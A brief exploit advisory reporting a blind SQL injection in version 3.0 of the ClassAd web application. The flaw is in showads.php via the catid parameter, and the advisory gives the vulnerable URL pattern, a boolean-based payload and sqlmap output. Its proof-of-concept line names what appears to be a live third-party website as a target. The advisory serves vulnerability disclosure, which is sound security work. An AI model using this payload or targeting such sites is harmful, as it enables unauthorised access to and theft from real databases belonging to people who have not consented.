ClassAd version 3.0 suffers from a remote SQL injection vulnerability.
08e3f466466b70f7c2ba6f79ba80db7b44175d81abd88c0594531502dedcd2c6
# Bilnd SQL Injection on ClassAd
# Risk: High
# CWE number: CWE-89
# Date: 9/11/2014
# Vendor: projects-and-software.de
# Version: 3.0
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Linux Ubuntu 14.04; Mozilla Firefox 34.0;
sqlmap 1.0-dev-nongit-20141106
# Vulnerable File: showads.php
# Exploit: http:/host/path/showads.php?catid=[SQLI]
# PoC: http://petroman.de/showads.php?catid=[SQLI]
--- "SQLi using sqlmap."---
Place: GET
Parameter: catid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catid=2 AND 2467=2467
---
# Thank's